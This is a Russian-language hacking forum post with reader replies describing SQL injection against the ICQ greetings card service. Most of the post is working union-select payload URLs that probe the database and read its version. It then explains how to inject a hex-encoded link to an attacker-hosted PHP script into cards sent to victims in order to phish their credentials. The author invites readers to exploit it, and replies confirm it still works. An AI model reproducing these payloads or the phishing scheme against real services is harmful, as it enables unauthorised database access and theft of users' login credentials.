![]() |
используем уязвимость на Icq.com
ICQ# через ICQ.COM Вводное слово: Статьи писать, дело неблагодарное. С одной стороны для людей продвинутых написанное является бояном и не достойным внимания, с другой стороны для начинающих «хакеров» многое кажется непонятным, в конце концов, и те и те остаются недовольны, а найти золотую середину может или педагог или писатель, коими я не являюсь, так что не судите строго В статье будут ссылки на статьи: [cash] Проведение Инъекций в MSSQL сервер от Microsoft. http://forum.antichat.ru/thread30501.html NOmeR1 Заходим в Icq через Xss: http://forum.antichat.ru/thread53850.html hidden Применение Basic Authorization против форумов: http://forum.antichat.ru/showthread.php?t=20911 А также советую посмотреть различные статьи по XSS Приступим: Как то давно, блуждая по ICQ.com набрел я на sql инъекцию, правда инъекция была бесполезной т.к. ограничивалась только 11-ю символами, но факт наличия инъекции обрадовал, значит не все потеряно, гуляя по ссылкам я набрел вот на это: Код:
http://greetings.icq.com/greetings/cards/254/Код:
http://greetings.icq.com/greetings/cards/253 order by 19/Код:
http://greetings.icq.com/greetings/cards/253 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--/Код:
http://greetings.icq.com/greetings/cards/253 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--/Код:
http://greetings.icq.com/greetings/cards/-253 union select null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/Код:
http://greetings.icq.com/greetings/cards/-253 union select null,0x3a,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/Код:
http://greetings.icq.com/greetings/cards/-253 union select null,@@version,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/Цитата:
Дабы искушать начинающих на изучение инъекций в TSQL не буду приводить дальнейшие действия, как например получение схемы БД и т.д. скажу только что для просмотра «самой интересной» базы прав пользователя не хватает, при раскручивании инъекции очень поможет статья [cash]`а Проведение Инъекций в MSSQL сервер от Microsoft. т.к. SYBASE и MSSQL очень похожи. К тому же цель данной статьи немного другая. Продолжаем: Искав выгоду и другие инъекции, я нашел такую интересную штуку: Код:
http://greetings.icq.com/greetings/cards/169-1/send#send_scopeКод:
http://greetings.icq.com/greetings/cards/-169 union select 0x3a3a3a,0x3a,0x55,111,111,111--/send#send_scopeЦитата:
Отослав с помощь формы полученное себе на мыло я получил письмо от ICQ Greetings <ICQ.Greetings@icqweb-m01.icq.aol.com>: Цитата:
Вспомнив статью hidden`а Применение Basic Authorization против форумов я написал скрипт и залил его на сервер, скрипт такой: PHP код:
Цитата:
называем скрипт например 1.php и захексим полный путь до скрипта: http://site/1.php -> 0x687474703A2F2F736974652F312E706870 дальше просто вставляем это в первое поле инъекта и отправляем жертве: Код:
http://greetings.icq.com/greetings/cards/-169 union select 0x687474703A2F2F736974652F312E706870,0x3a,0x55,111,111,111--/send#send_scopeЗаканчиваем: Да немного народу на это ведется но и фантазия Соц. инженеров безгранична, особенно сейчас, когда стали модны социальные сети, например можно сделать редирект на фейк, который описал в своей статье Заходим в Icq через Xss NOmeR1. Вобщем мое дело показать, ваше дело эксплуатировать. Спасибо за прочтение. Scipio |
Спасибо, давно я не читал интересный статей :)
жирный плюс |
У меня не работает уже.
|
Цитата:
|
Так че не работает уже?(
А статья 5 баллов) |
Должно все работать, только что попробовал, все работает
ЗЫ Спасибо всем за хорошие отзывы |
вобще там около 5 скулей я нашел или больше, реально сервис бажный, жалко только прав маловато, но при определенном умении и из этого можно кое что выжать
|
| Время: 20:51 |